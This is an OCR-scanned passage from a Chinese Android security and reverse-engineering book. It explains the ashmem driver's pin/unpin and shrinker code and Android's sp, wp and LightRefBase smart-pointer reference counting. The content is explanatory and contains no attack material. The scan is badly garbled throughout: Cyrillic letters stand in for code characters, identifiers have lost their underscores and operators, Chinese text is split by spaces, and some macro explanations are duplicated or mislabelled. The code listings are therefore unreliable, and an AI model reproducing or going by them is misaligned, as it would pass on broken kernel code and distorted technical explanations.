static long ashmem ioctl(struct file *file, unsigned int cmd, unsigned long arg) 
{ 
struct ashmem_ area *asma = file->private_data; 
long ret = -ENOTTY; 
switch (cmd) { 


1 Android 系统 安全 和 反 编译 实战 


case ASHMEM PIN: 

case ASHMEM UNPIN: 
геї = ashmem pin unpin(asma, cmd, (void — user *) arg); 
break; 


} 


return ret; 


} 
在 上 述 代码 中 ， 调 用 函数 ashmem pin_unpin0 处 理 控制 命令 ASHMEM PIN 和 ASHMEM UNPIN. if 
数 ashmem_pin_unpin() 的 实现 流程 如 下 所 示 。 


口 


口 


口 


口 


口 


口 


获取 传递 到 用 户 空 间 的 参数 ， 并 将 获取 值 保存 在 本 地 变量 pin 中 。 这 是 一 个 struct ashmem_pin 类 型 的 
结构 体 类 型 ， 在 其 中 包括 了 要 pin/unpin 的 内 存 块 的 起 始 地 址 和 大 小 。 


因为 起 始 地 址 和 大 小 的 单位 都 是 字 节 ， 所 以 通过 转换 处 理 为 以 页 面 为 单位 ， 并 保存 在 本 地 变量 
pgstart 和 pgend 中 。 

不 但 对 参数 进行 安全 性 检查 ， 而 且 要 确保 只 要 从 用 户 空间 传 进来 的 内 存 块 的 大 小 值 为 0， 就 认为 是 
要 pin/unpin 整 个 匿名 共享 内 存 。 

判断 当前 要 执行 操作 的 类 别 ， 根 据 ASHMEM_PIN 操 作 和 ASHMEM_UNPIN 操 作 分 别 执行 


ashmem_pin 和 ashmem_unpin 。 

当 创建 匿名 共享 内 存 时 ， 所 有 默认 的 内 存 都 是 pinned 状 态 的 ， 只 有 用 户 告诉 Ashmem 驱 动 程序 要 
unpin 某 一 块 内 存 时 ，Ashmem 驱 动 程序 才 会 把 这 块 内 存 unpin。 

用 户 告知 Ashmem 驱 动 程序 重新 pin 某 一 块 前 面 被 unpin 过 的 内 存 块 ， 这 样 能 够 将 此 内 存 从 unpinned 
状态 转换 为 pinned 状 态 。 


函数 ashmem_pin_unpin() 在 文件 kernel/goldfish/ashmem.c 中 实现 ， 具 体 的 实现 代码 如 下 所 示 。 
static int ashmem pin unpin(struct ashmem area *asma, unsigned long cmd, 


{ 


void __ user *р) 


struct ashmem_ pin pin; 
size_t pgstart, pgend; 
int ret = -EINVAL; 


if (unlikely(!asma->file)) 
return -EINVAL; 


if (unlikely(copy from user(&pin, p, sizeof(pin)))) 
return -EFAULT; 


/* per custom, you can pass zero for len to mean "everything onward" */ 
if (Ipin.len) 
pin.len = PAGE ALIGN(asma-»size) - pin.offset; 


if (unlikely((pin.offset | pin.len) & -PAGE MASK)) 
return -EINVAL; 


if (unlikely(((__u32) -1) - pin.offset < pin.len)) 
return -EINVAL; 


if (unlikely(PAGE_ALIGN(asma->size) < pin.offset + pin.len)) 
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return -EINVAL; 


pgstart = pin.offset / PAGE SIZE; 
pgend = pgstart + (pin.len/ PAGE SIZE) - 1; 


mutex lock(&ashmem mutex); 


Switch (cmd) ( 
case ASHMEM PIN: 
ret = ashmem pin(asma, pgstart, pgend); 
break; 
case ASHMEM UNPIN: 
геї  ashmem unpin(asma, pgstart, pgend); 
break; 
case ASHMEM GET PIN STATUS: 
ret = ashmem get pin status(asma, pgstart, pgend); 
break; 


} 
mutex unlock(&ashmem mutex); 


return ret; 


} 
由 此 可 见 ， 执 行 ASHMEM_PIN 操作 的 目标 对 象 必须 是 一 块 处 于 unpinned 状态 的 内 存 块 。 
函数 ashmem_unpin() 的 功能 是 解锁 某 一块 匿 名 共享 内 存 ， 有 具体 处 理 流程 如 下 所 示 。 


口 


口 


在 遍历 asma->unpinned_list 列 表 时 ， 查 找 当 前 处 于 unpinned 状 态 的 内 存 块 是 否 与 将 要 unpin 的 内 存 块 
[pgstart, pgend] 相 交 ， 如 果 相交 则 通过 执行 合并 操作 调整 pgstart 和 pgend 的 大 小 。 

调用 函数 range_del0) 删 除 原来 的 已 经 被 unpinned 过 的 内 存 块 。 

调用 函数 range_alloc0 重 新 unpinned 调 整 过 后 的 内 存 块 [pgstart，pgend]， 此 时 新 的 内 存 块 [pgstart， 
pgend] 已 经 包含 了 刚才 所 有 被 删 掉 的 unpinned 状 态 的 内 存 。 

如 果 找 到 相交 的 内 存 块 ， 并 且 调 整 了 pgstart 和 pgend 的 大 小 之 后 ， 需 要 重新 扫描 asma->unpinned_list 
列表 。 原 因 是 新 的 内 存 块 [pgstart, pgend] 可 能 与 前 后 的 处 于 unpinned 状 态 的 内 存 块 发 生 相 交 。 


函数 ashmem_unpin() 在 文件 kernel/goldfish/ashmem.c 中 定义 ， 具 体 的 实现 代码 如 下 所 示 。 
static int ashmem unpin(struct ashmem area *asma, size t pgstart, size t pgend) 


t 

struct ashmem range *range, *next; 

unsigned int purged = ASHMEM NOT PURGED; 
restart: 


list for each entry safe(range, next, &asma-»unpinned list, unpinned) ( 
if(page range subsumed by range(range, pgstart, pgend)) 
return 0; 
if (page range in range(range, pgstart, pgend)) ( 
pgstart = min t(size t, range->pgstart, pgstart), 
pgend = max t(size t, range->pgend, pgend); 
purged |= range->purged; 
range_del(range); 
goto restart; 
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m range alloc(asma, range, purged, pgstart, pgend); 
} 
range before page 的 操作 是 一 个 宏 定 义 ， 功 能 是 判断 range 描述 的 内 存 块 是 否 在 page 页 面 之 前 ， 如 果 
是 则 表示 结束 整个 描述 。asma->unpinned_list 列表 是 按照 页 面 号 从 大 到 小 进行 排列 的 ， 并 且 每 一 块 被 unpin 
的 内 存 都 是 不 相交 的 。range_before_pag 的 定义 代码 如 下 所 示 。 
#define range before page(range, page) \ 
((range)->pgend < (page) 
page range subsumed by range 的 操作 也 是 一 个 宏 定 义 , 功能 是 判断 内 存 块 是 否 包含 了 [start, end], ШЖ 
包含 则 说 明 当前 要 unpin 的 内 存 块 已 经 处 于 unpinned 状态 。 如 果 什 么 也 不 用 操作 则 直接 返回 。page_range_ 
subsumed_by_range 的 定义 代码 如 下 所 示 。 
#define page range subsumed by range(range, start, end) X 
(((range)- pgstart <= (start)) && ((range)->pgend >= (end))) 
page range in range 的 操作 也 是 一 个 宏 定 义 ， 功 能 是 判断 内 存 块 [start end] 是 否 互相 包 或 者 相交 。 
page_range_in_range 的 定义 代码 如 下 所 示 。 
#define page range in range(range, start, end) V 
(page in range(range, start) || page in range(range, end) || Y 
page range subsumes range(range, start, end)) 
page range subsumed by range 的 操作 也 是 一 个 宏 定义 ,功能 是 判断 内 存 块 range 是 否 包含 内 存 块 [start, 
end]. page range subsumed by range 的 定义 代码 如 下 所 示 。 
#define page range subsumed by range(range, start, end) Y 
(((range)->pgstart <= (start)) && ((range)->pgend >= (end))) 
range_in_range() 的 操作 也 是 一 个 宏 定 义 ， 功 能 是 判断 内 存 块 地 址 page 是 否 包含 在 内 存 块 range 中 。 
range_in_range() 的 定义 代码 如 下 所 示 。 
#define page in range(range, page) \ 
(((range)->pgstart <= (page)) && ((range)->pgend >= (page))) 
再 看 函数 range_del()， 功 能 是 从 asma->unpinned_list 中 删除 内 存 块 ， 并 判断 它 是 否 在 1ги 列表 中 。 函 数 
range_del() 的 具体 实现 代码 如 下 所 示 。 
static void range del(struct ashmem range *range) 


list del(&range-»unpinned); 
if ((ange on Іги(гапде)) 
Iru del(range); 
kmem cache free(ashmem range cachep, range); 
} 
再 看 函数 lru_del0， 内 存 块 的 状态 purged 值 为 ASHMEM_NOT_PURGED, 表示 现在 没有 收回 对 应 的 物 
理 页 面 ， 那 么 内 存 块 就 位 于 Iru 列表 中 ， 则 使 用 函数 lru_del0 删 除 这 个 内 存 块 。 函 数 lru_del0 的 具体 实现 代 
Tid P Wr. 


static inline void Іги del(struct ashmem range *range) 


list del(&range-»lru); 
lIru count-- range size(range); 
} 
再 看 在 函数 ashmem_unpin 中 调用 的 range alloc 函数 , 其 功能 是 从 slab 缓冲 区 中 ashmem range cachep 
分 配 一 个 ashmem_range， 并 进行 相应 的 初始 化 处 理 。 然 后 放 在 对 应 的 列表 ashmem_area->unpinned_list 中 ， 
并 判断 这 个 range 的 purged 是 否 处 于 ASHMEM NOT PURGED 状态 ， 如 果 是 则 要 把 它 放 在 Iru 列表 中 。 РЁ 


@ 
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Ji range_alloc 在 文件 kernel/goldfish/ashmem.c 中 实现 ， 具 体 的 实现 代码 如 下 所 示 。 
static int range alloc(struct ashmem area *asma, 
struct ashmem range *prev range, unsigned int purged, 
size_t start, size_t end) 


struct ashmem_range *range; 
range = kmem cache zalloc(ashmem range cachep, GFP_KERNEL); 
if (unlikely(!range)) 
return -ENOMEM; 
гапде->аѕта = asma; 
range->pgstart = start; 
range->pgend = end; 
range->purged = purged; 
list_add_tail(&range->unpinned, &prev_range->unpinned); 
if (range_on_Iru(range)) 
Iru add(range); 
return 0; 
) 
再 看 函数 lru_add(), 功 能 是 将 未 被 回收 的 已 解锁 内 存 块 添加 到 全 局 列表 ashmem Ісы list t. eH lru. add() 
在 文件 kernel/goldfish/ashmem.c 中 实现 ， 有 具体 的 实现 代码 如 下 所 示 。 
static inline void Iru add(struct ashmem range *range) 


{ 


list add tail(&range-»Iru, &ashmem_Iru_list); 
lIru count += range size(range); 

) 

再 看 函数 ashmem_pin(), 功能 是 锁定 一 块 匿名 共享 内 存 区 域 .被 pin 的 内 存 块 肯定 被 保存 在 unpinned list 
列表 中 ， 如 果 不 在 则 什么 都 不 用 做 。 要 想 判 断 在 unpinned_list 列表 中 是 否 存在 pin 的 内 存 块 ， 需 要 通过 遍历 
asma->unpinned list 列表 的 方式 找 出 与 之 相交 的 内 存 块 。 函 数 ashmem_pin() 在 文件 kernel/goldfish/ashmem.c 
中 实现 ， 有 具体 的 实现 代码 如 下 所 示 。 

static int ashmem pin(struct ashmem_area *asma, size t pgstart, size t pgend) 

{ 

struct ashmem_ range *range, *next; 
int ret = ASHMEM NOT PURGED; 


list for each entry safe(range, next, &asma->unpinned list, unpinned) ( 
if (range before page(range, pgstart)) 
break; 
if (page range in range(range, pgstart, pgend)) ( 
ret |= range->purged; 
if (page_range_subsumes_range(range, pgstart, pgend)) { 
range_del(range); 
continue; 
} 
if (range->pgstart >= pgstart) { 
range_shrink(range, pgend + 1, range->pgend); 
continue; 
} 
if (range->pgend <= pgend) { 
range_shrink(range, range->pgstart, pgstart-1); 


ез 


continue; 
} 
range alloc(asma, range, range->purged, 
pgend + 1, range->pgend); 
range shrink(range, range->pgstart, pgstart - 1); 
break; 
} 
} 


return ret; 


} 
在 上 述 代码 中 对 重新 锁定 内 存 块 操作 实现 了 判断 ， 通 过 证 语句 处 理 了 如 下 4 种 情形 。 
О 指定 要 锁定 的 内 存 块 [start end] 包 含 了 解锁 状态 的 内 存 块 range， 此 时 只 要 将 解锁 状态 的 内 存 块 range 
从 其 宿主 匿名 共享 内 存 的 解锁 内 存 块 列表 unpinned_list 中 删除 即 可 。 

а 合并 要 锁定 内 存 块 [pgstart,pgend] 的 后 半 部 分 和 解锁 状态 内 存 块 range 的 前 半 部 分 ， 此 时 将 解锁 状态 
内 存 块 range 的 开始 地 址 设置 为 要 锁定 内 存 块 的 末尾 地 址 的 下 一 个 页 面 地 址 。 

口 合并 要 锁定 内 存 块 [pgstart,pgend] 的 前 半 部 分 和 解锁 状态 内 存 块 range 的 后 半 部 分 ， 此 时 将 解锁 状态 
内 存 块 range 的 末尾 地 址 设置 为 要 锁定 内 存 块 的 开始 地 址 的 下 一 个 页 面 地 址 。 

О 设置 要 锁定 内 存 块 [pgstart,pgend] 包 含 在 解锁 状态 内 存 块 range 中 。 

再 看 函数 range_shrink()， 功 能 是 设置 range 描述 的 内 存 块 的 起 始 页 面 号 ， 如 果 还 存在 于 Iru 列表 中 ， 则 
需要 调整 在 Iru 列表 中 的 总 页 面 数 大 小 。 函 数 range_shrink0 在 文件 kernel/goldfish/ashmem.c 中 实现 ， 有 具体 的 
实现 代码 如 下 所 示 。 

static inline void range_shrink(struct ashmem_range *range, 

size_t start, size_t end) 


( 
size_t pre = range_size(range); 
range->pgstart = start; 
range->pgend = end; 
if (range_on_Iru(range)) 
Iru_count -= pre - range_size(range); 
p 


5.17 回收 内 存 块 


接 下 来 看 最 后 一 步 : 回收 匿名 共享 内 存 块 ， 先 回 到 前 面 介 绍 的 初始 化 步骤 ， 分 析 Ashmem 驱动 初始 化 
函数 ashmem_init())， 此 函数 会 调用 函数 register_shrinker0 向 内 存 管 理 系统 注册 一 个 内 存 回收 算法 函数 ， 有 具体 
实现 代码 如 下 所 示 。 

static struct shrinker ashmem shrinker = { 

-Shrink = ashmem shrink, 
.Seeks = DEFAULT SEEKS * 4, 


static int — init ashmem init(void) 


d 


register shrinker(&ashmem shrinker); 
printK(KERN INFO "ashmem: initialized\n"); 


(m, 
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return 0; 
} 
其 实在 Linux 内 核 程序 中 , 当 系 统 内存 不 够 用 时 ,内 存 管理 系统 就 会 通过 调用 内 存 回收 算法 的 方式 删除 
最 近 没 有 用 过 的 内 存 ， 将 其 从 物理 内 存 中 清除 ， 这 样 可 以 增加 物理 内 存 的 容量 。 所 以 在 Android 系统 中 也 借 
用 了 这 种 机 制 ， 当 内 存 管理 系统 回收 内 存 时 会 调用 函数 ashmem_shrink() 以 执行 内 存 回 收 操作 。 函 数 
ashmem_shrink() 在 文件 kernel/goldfish/ashmem.c 中 实现 ， 具 体 的 实现 代码 如 下 所 示 。 
static int ashmem shrink(struct shrinker *s, struct shrink control *sc) 


{ 


struct ashmem range *range, *next; 
/* We might recurse into filesystem code, so bail out if necessary */ 
if (sc->nr to scan && l(sc-»gfp mask & _ СЕР FS)) 
return -1; 
if (Isc-»nr to scan) 
return Iru count; 
mutex lock(&ashmem mutex); 
list for each entry safe(range, next, &ashmem Іги list, Iru) ( 
loff t start = range->pgstart * PAGE SIZE; 
loff tend = (range->pgend + 1) * PAGE SIZE; 
do_fallocate(range->asma->file, 
FALLOC FL PUNCH HOLE | FALLOC FL KEEP SIZE, 
start, end - start); 
range->purged = ASHMEM WAS PURGED; 
Iru del(range); 
ѕс->пг to scan -= range size(range); 
if(sc-»nr to scan <= 0) 
break; 
) 
mutex unlock(&ashmem mutex); 
return Iru count; 
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GR 知识 点 讲解 :光盘 :视频 \ 知 识 点 \ 第 5 章 \ 内 存 优化 机 制 详解 .avi 
在 Android 系统 中 ,使 用 垃圾 回收 机 制 的 方式 达到 节约 内 存 的 目的 ， 并 最 终 实现 提高 手机 的 处 理 效率 的 
目的 。 本 节 将 详细 讲解 Android 系统 中 的 垃圾 回收 机 制 的 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


5.2.1 sp 和 wp 简 析 


在 传统 的 C++ 编程 语言 中 ， 指 针 一 直 是 程序 员 的 最 大 学 习 障碍 。 指 针 比较 复杂 ， 一 旦 使 用 不 当 就 会 造 

成 内 存 泄漏 的 问题 。 例 如 ， 用 new 新 建 一 个 对 象 并 使 用 完 之 后 ， 经 常 忘 记 delete (JR) 这 个 对 象 ， 长 期 下 
会 造成 系统 崩溃 。 在 Android 系统 中 ， 因 为 其 运行 时 库 这 一 层 代 码 是 用 C++ 语言 编写 的 ， 所 以 也 会 因为 使 
用 指针 的 原因 而 造成 内 存 泄漏 问题 。 为 此 Android 特意 提供 了 智能 指针 机 制 , 通过 使 用 sp 命令 和 wp 命令 来 
解决 指针 问题 。 其 实 sp 和 wp 就 是 Android 为 其 C++ 实现 的 自动 垃圾 回收 机 制 。 如 果 具 体 到 内 部 实现 ，sp 
和 wp 实际 上 只 是 一 个 实现 垃圾 回收 功能 的 接口 而 已 ， 而 真正 实现 垃圾 回收 的 是 RefBase 基 类 。 这 部 分 代码 
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位 于 如 下 文件 中 。 

/frameworks/base/include/utils/RefBase.h 

在 此 所 有 的 类 都 会 虚 继承 于 RefBase 类 ， 因 为 它 实 现 了 Android 垃圾 回收 所 需要 的 所 有 function, [ШЕ 
实际 上 所 有 的 对 象 声 明 出 来 以 后 都 具备 了 自动 释放 自己 的 能 力 ， 也 就 是 说 实际 上 智能 指针 就 是 对 象 本 身 ， 
它 会 维持 一 个 对 本 身 强 引 用 和 弱 引 用 的 计数 ， 一 旦 强 引用 计数 为 0 它 就 会 释放 掉 自 己 。 

(1) sp 

sp 实际 上 不 是 smart pointer 的 缩写 ， 而 是 strong pointer， 其 内 部 只 包含 了 一 个 指向 对 象 的 指针 。 可 以 简 
单 看 一 下 sp 的 一 个 构造 函数 。 

template< typename T> 

sp< T>::sp(T* other) 

:m ptr(other) 


{ 
if (other) other->incStrong(this); 


} 

例如 ， 声 明 一 个 对 象 。 

sp< CameraHardwarelnterface> hardware(new CameraHal()); 

实际 上 sp 指针 对 本 身 没有 进行 什么 操作 ， 就 是 一 个 指针 的 赋值 ， 包 含 了 一 个 指向 对 象 的 指针 ， 但 是 对 
象 会 对 对 象 本 身 增 加 一 个 强 引用 计数 ， 这 个 incStrong 的 实现 就 在 refbase 类 中 。 新 建 一 个 CameraHal 对 象 ， 
将 其 值 给 sp<CameraHardwareInterface> 时 ， 它 的 强 引用 计数 就 会 从 0 ZA 1。 因 此 每 次 将 对 象 赋值 给 一 个 
sp 指针 时 ， 对 象 的 强 引 用 计数 都 会 加 1， 下面 再 看 看 sp 的 析 构 函数 。 

template< typename T> 

sp< T>::~sp() 


| 
if (m ptr) m_ptr->decStrong(this); 


} 

实际 上 每 次 删除 一 个 sp 对 象 时 ，sp 指针 指向 的 对 象 的 强 引 用 计数 就 会 减 1， 当 对 象 的 强 引 用 计数 为 0 
时 ， 这 个 对 象 就 会 被 自动 释放 掉 。 

(2) wp 

wp 是 Weak Pointer 的 缩写 ， 弱 引用 指针 的 原理 ， 就 是 为 了 应 用 Android 垃圾 回收 来 减少 那些 “胖子 ” 
对 象 对 内 存 的 占用 ， 首 先 来 看 wp 的 一 个 构造 函数 。 

wp<T>::wp(T* other) 

:m_ptr(other) 


{ 
if (other) m refs = other->createWeak(this); 


} 

wp 和 sp 一 样 ， 实 际 上 也 就 是 仅仅 对 指针 进行 了 赋值 而 已 ， 对 象 本 身 会 增加 一 个 对 自身 的 弱 引 用 计数 ， 
同时 wp 还 包含 一 个 m_ref 指针 ， 这 个 指针 主要 是 用 来 将 wp 升级 为 sp 时 使 用 的 。 

template< typename T> 

sp<T> wp<T>::promote() const 


{ 

return sp<T>(m_ptr, m_refs); 

} 

template< typename T> 

sp<T>::sp(T* p, weakref type* refs) 

:m ptr((p && refs->attemptincStrong(this)) ? p : 0) 


{ 
} 
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实际 上 对 wp 指针 唯一 能 做 的 就 是 将 wp 指针 升级 为 一 个 sp 指针 ， 然 后 判断 是 否 升级 成 功 ， 如果 成 功 说 
明 对 象 依旧 存在 ， 如 果 失 败 说 明 对 象 已 经 被 释放 掉 了 。 wp 指针 多 在 单 例 中 使 用 ， 确 保 mhardware 对 象 只 有 
-个 ， 例 如 : 
wp< CameraHardwarelnterface> CameraHardwareStub::singleton; 
sp< CameraHardwarelnterface> CameraHal::createlnstance() 


{ 

LOG_FUNCTION_NAME 

if (singleton != 0) ( 

sp< CameraHardwarelnterface> hardware = singleton.promote(); 
if (hardware != 0) ( 

return hardware; 


) 


) 

sp< CameraHardwarelnterface> hardware(new CameraHal()); // 强 引用 加 1 
singleton = hardware; — // 弱 引用 加 1 

return hardware; // 赋 值 构造 函数 ， 强 引用 加 1 


ise 被 删除 ， 强 引用 减 1 
5.2.2 ”智能 指针 基础 


在 Android 的 源 代码 中 ， 经 常会 看 到 形 如 sp<xxx>、wp<xxx> 形 式 的 类 型 定义 ， 这 其 实 是 Android 中 的 
智能 指针 。Android 的 智能 指针 相关 的 源 代 码 在 如 下 两 个 文件 中 。 

frameworks/base/include/utils/RefBase.h 

frameworks/base/libs/utils/RefBase.cpp 


涉及 的 类 以 及 类 之 间 的 关系 如 图 5-1 所 示 。 


5-1 智能 指针 相关 类 的 关系 


Android 中 定义 了 3 种 智能 指针 类 型 ， 分 别 是 强 指针 sp (Strong Pointer) 、 弱 指针 (Weak Pointer) 和 
轻 量 级 指针 (Light Pointer) 。 其 实 称 为 强 引 用 和 弱 引 用 更 合适 一 些 。 强 指针 与 一 般 意义 的 智能 指针 概念 相 
同 ， 通 过 引用 计数 来 记录 有 多 少 使 用 者 在 使 用 一 个 对 象 ， 如 果 所 有 使 用 者 都 放弃 了 对 该 对 象 的 引用 ， 则 该 
对 象 将 被 自动 销毁 。 
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弱 指针 也 指向 一 个 对 象 ， 但 是 弱 指针 仅仅 记录 该 对 象 的 地 址 ， 不 能 通过 弱 指针 来 访问 该 对 象 ， 也 就 是 
说 不 能 通过 弱 指针 来 调用 对 象 的 成 员 函 数 或 访问 对 象 的 成 员 变量 。 要 想 访问 弱 指 针 所 指向 的 对 象 ， 需 首先 
将 弱 指针 升级 为 强 指针 (通过 wp 类 所 提供 的 promote() 方 法 ) 。 弱 指针 所 指向 的 对 象 是 有 可 能 在 其 他 地 方 被 
销毁 的 ， 如 果 对 象 已 经 被 销毁 ，wp 的 promote() 方 法 将 返回 空 指针 ， 这 样 就 能 避免 出 现 地 址 访问 错 的 情况 。 

究竟 指针 是 怎么 做 到 这 一 点 的 呢 ? 其 实 一 点 也 不 复杂 ， 原 因 就 在 于 每 一 个 可 以 被 智能 指针 引用 的 对 象 
都 同时 被 附加 了 另外 一 个 weakref impl 类 型 的 对 象 ， 这 个 对 象 负责 记录 对 象 的 强 指针 引用 计数 和 弱 指针 引 
用 计数 。 这 个 对 象 是 智能 指针 实现 内 部 使 用 的 ， 智 能 指针 的 使 用 者 看 不 到 这 个 对 象 。 弱 指针 操作 的 就 是 这 
个 对 象 ， 只 有 当 强 引用 计数 和 弱 引 用 计数 都 为 0 时 ， 这 个 对 象 才 会 被 销毁 。 

接 下 来 开始 分 析 如 何 使 用 智能 指针 。 假 设 现在 有 一 个 类 MyClass， 如 果 要 使 用 智能 指针 来 引用 这 个 类 的 
对 象 ， 那 么 这 个 类 需 满足 下 列 两 个 前 提 条 件 。 

(1) 该 类 是 基 类 RefBase 的 子 类 或 间接 子 类 。 

(2) 该 类 必须 定义 虚构 造 函 数 ， 即 其 构造 函数 需要 这 样 定义 : 

virtual ~MyClass(); 

满足 了 上 述 条 件 的 类 就 可 以 定义 智能 指针 ， 定 义 方法 和 普通 指针 类 似 。 例 如 ， 普 通 指针 是 这 样 定义 : 

MyClass* p obj; 

智能 指针 则 是 这 样 定义 : 

sp<MyClass> p_obj; 

注意 不 要 定义 成 sp<MyClass>* p. obj. 初学 者 容易 犯 这 种 错误 ,这 样 实际 上 相当 于 定义 了 一 个 指针 的 指 
针 。 尽 管 在 语法 上 没有 问题 ， 但 是 最 好 永远 不 要 使 用 这 样 的 定义 。 

定义 了 一 个 智能 指针 的 变量 ， 就 可 以 像 普通 指针 那样 使 用 该 指针 ， 包 括 赋值 、 访 问 对 象 成 员 、 作 为 函 
数 的 返回 值 、 作 为 函数 的 参数 等 。 例 如 : 

p_obj = new MyClass(); ll 注意 不 要 写成 p_obj = new sp<MyClass> 

sp<MyClass> p obj2 = p obj; 

p. obj-»func(); 

p obj- create obj(); 

some func(p obj); 

注意 不 要 试图 delete OHR) 一 个 智能 指针 ， 即 执行 delete p obj 操作 。 用 户 无 需 担 心 对 象 的 销毁 问题 ， 
智能 指针 的 最 大 作用 就 是 自动 销毁 不 再 使 用 的 对 象 。 当 不 需要 再 使 用 一 个 对 象 后 ， 只 需 直接 将 指针 赋值 为 
NULL 即 可 。 

) obj = NULL; 

上 面 说 的 都 是 强 指针 ， 弱 指针 的 定义 方法 和 强 指针 类 似 ， 但 是 不 能 通过 弱 指针 来 访问 对 象 的 成 员 。 下 
面 是 弱 指针 的 示例 : 

wp<MyClass> wp obj = new MyClass(); 

p_obj = wp_obj.promote(); /升级 为 强 指针 。 不 过 这 里 要 用 “.” 而 不 是 “->” 

wp obj = NULL; 

由 此 可 见 ， 智 能 指针 用 起 来 很 方便 ， 在 一 般 情 况 下 最 好 使 用 智能 指针 来 代替 普通 指针 。 但 是 需要 知道 

-个 智能 指针 其 实 是 一 个 对 象 ， 而 不 是 一 个 真正 的 指针 ， 因 此 其 运行 效率 是 远 远 比 不 上 普通 指针 的 。 所 以 

在 对 运行 效率 敏感 的 情况 下 ， 最 好 还 是 不 要 使 用 智能 指针 。 


52.3 вінт 


在 Android RAP, 轻 量 级 指针 通过 引用 计数 技术 来 维护 对 象 的 声明 周期 。 支持 轻 量 级 指针 的 对 象 必须 
继承 自 基 类 LightRefBase， 类 LightRefBase 在 文件 frameworks\native\include\utils\RefBase.h 中 定义 ， 具 体 实 
现代 码 如 下 所 示 。 
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template <class T> 
class LightRefBase 
{ 
public: 
inline LightRefBase() : mCount(0) { } 
inline void incStrong(const void* id) const { 
android_atomic_inc(&mCount); 
} 
inline void decStrong(const void* id) const { 
if (android_atomic_dec(&mCount) == 1) { 
delete static_cast<const T*>(this); 
} 
} 
II! DEBUGGING ONLY: Get current strong ref count 
inline int32_t getStrongCount() const { 
return mCount; 
} 
typedef LightRefBase<T> basetype; 
protected: 
inline ~LightRefBase() { } 
private: 
friend class ReferenceMover; 
inline static void moveReferences(void* d, void const* s, size t n, 
const ReferenceConverterBase& caster) ( ) 
private: 
mutable volatile int32 t mCount; 
X 


由 上 述 代码 可 以 看 出 ， 类 LightRefBase 只 有 一 个 引用 计数 器 成 员 变 量 mCount， 其 初始 化 值 为 0。 另 外 ， 
类 LightRefBase 还 通过 成 员 函 数 incStrong0 和 decStrong() 维 护 引用 计数 器 的 值 ， 这 两 个 函数 被 智能 指针 调用 。 
在 函数 decStong0 中 ， 如 果 当 前 引用 计数 值 为 1， 那 么 当 减 1 后 就 会 变 为 0， 这 表示 delete MR) 这 个 对 象 。 

在 Android 系统 中 ， 和 LightRefBase 引用 计数 配套 使 用 的 智能 指针 类 是 sp，sp 是 轻 量 级 指针 的 实现 类 。 


在 文件 frameworks, native. include, utils. RefBase.h 中 ，sp 的 具体 实现 代码 如 下 所 示 。 
template <typename T> 
class sp 


{ 
public: 
typedef typename RefBase::weakref type weakref type; 


inline sp() : m ptr(0) { } 

sp(T* other);//T 表示 对 象 的 实际 类 型 

sp(const sp<T>& other); 

template<typename U> sp(U* other); 
template<typename U> sp(const sp<U>& other); 
~sp(); 

// Assignment 


sp& operator = (T* other); 
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Sp& operator = (const sp<T>& other); 


template<typename U> sp& operator = (const sp<U>& other); 
template«typename U> sp& operator = (U* other); 


// Special optimization for use by ProcessState (and nobody else) 
void force set(T* other); 


// Reset 
void clear(); 
11 Accessors 


inline T&operator* () const (return *m ptr; } 
inline  T*operator-» () const ( return m ріг; ) 
inline  T*get() const ( return m ptr; } 


// Operators 


COMPARE(-- 
COMPARE(I=) 
COMPARE(>) 
COMPARE(<) 
COMPARE(<=) 
COMPARE(>=) 


private: 
template<typename Y> friend class sp; 
template<typename Y> friend class wp; 


// Optimization for wp::promote() 
Sp(T* p, weakref type* refs); 


T*m ptr; 
X 
类 sp 有 如 下 两 个 构造 函数 。 
口 普通 构造 函数 。 
о 拷贝 构造 函数 。 
上 述 两 个 构造 函数 在 文件 frameworks. native, include, utils, RefBase.h 中 实现 ， 具 体 实现 代码 如 下 所 示 。 
template<typename T> 
sp<T>::sp(T* other) 
:m ptr(other) 
{ 


} 


if (other) other->incStrong(this); 


template<typename T> 
sp<T>::sp(const sp<T>& other) 
:m ptr(other.m ptr) 
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{ 
if (m_ptr) m_ptr->incStrong(this); 

} 

类 sp 中 包含 了 析 构 函数 ， 功 能 是 调用 m ptr 的 成 员 函 数 decStrong0 减 少 对 象 的 引用 计数 值 。 函 数 
decStrong0 在 类 LightRefBase 中 定义 ， 当 引用 计数 减 1 后 变 成 0 时 会 自动 delete (删除 ) 这 个 对 象 。 定 义 析 
构 函数 的 实现 代码 如 下 所 示 。 

template<typename T> 

sp<T>::~sp() 

{ 

if (m_ptr) m_ptr->decStrong(this); 
} 


5.2.4” 强 指针 


在 Android 系统 中 ， 强 指针 使 用 的 引用 计数 类 是 RefBase， 类 RefBase 比 类 LightRefBase 要 复杂 。 但 是 
其 功能 和 类 LightRefBase 一 样 ， 也 提供 了 incStrong 和 decStrong 成 员 函 数 来 操作 其 引用 计数 器 。 类 RefBase 
与 类 LightRefBase 的 最 大 区 别 是 ， 它 不 像 类 LightRefBase 一 样 直 接 提供 一 个 整 型 值 (mutable volatile int32_t 
mCount) 来 维护 对 象 的 引用 计数 。 原 因 是 复杂 的 引用 计数 技术 同时 支持 强 引用 计数 和 弱 引 用 计数 。 所 以 在 
类 RefBase 的 具体 实现 中 ， 强 引用 计数 和 弱 引 用 计数 功能 是 通过 其 成 员 变 量 mRefs 提供 的 。 
类 RefBase 在 文件 frameworks/native/include/utils/RefBase.h 中 定义 ， 具 体 实现 代码 如 下 所 示 。 
class RefBase 
{ 
public: 
void incStrong(const void* id) const; 
void decStrong(const void* id) const; 
void forcelncStrong(const void* id) const; 
II! DEBUGGING ONLY: Get current strong ref count. 
int32_tgetStrongCount() const; 
class weakref_type 
{ 
public: 
RefBase*refBase() const; 


void incWeak(const void* id); 
void decWeak(const void* id); 


11 acquires a strong reference if there is already one. 
bool attemptincStrong(const void* id); 


ll acquires a weak reference if there is already one. 

II This is not always safe. see ProcessState.cpp and BpBinder.cpp 
II for proper use. 

bool attemptincWeak(const void* id); 

I! DEBUGGING ONLY: Get current weak ref count. 

int32 tgetWeakCount() const; 

I! DEBUGGING ONLY: Print references held on object. 

void printRefs() const; 

I! DEBUGGING ONLY: Enable tracking for this object. 
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// enable — enable/disable tracking 
// retain -- when tracking is enable, if true, then we save a stack trace 


I for each reference and dereference; when retain == false, we 
1 match ир references and dereferences and keep only the 
I outstanding ones 


void trackMe(bool enable, bool retain); 
weakref type* createWeak(const void" id) const; 


weakref type* getWeakRefs() const; 
1 DEBUGGING ONLY: Print references held on object 
inline void printRefs() const ( getWeakRefs()->printRefs(); } 
1 DEBUGGING ONLY: Enable tracking of object. 
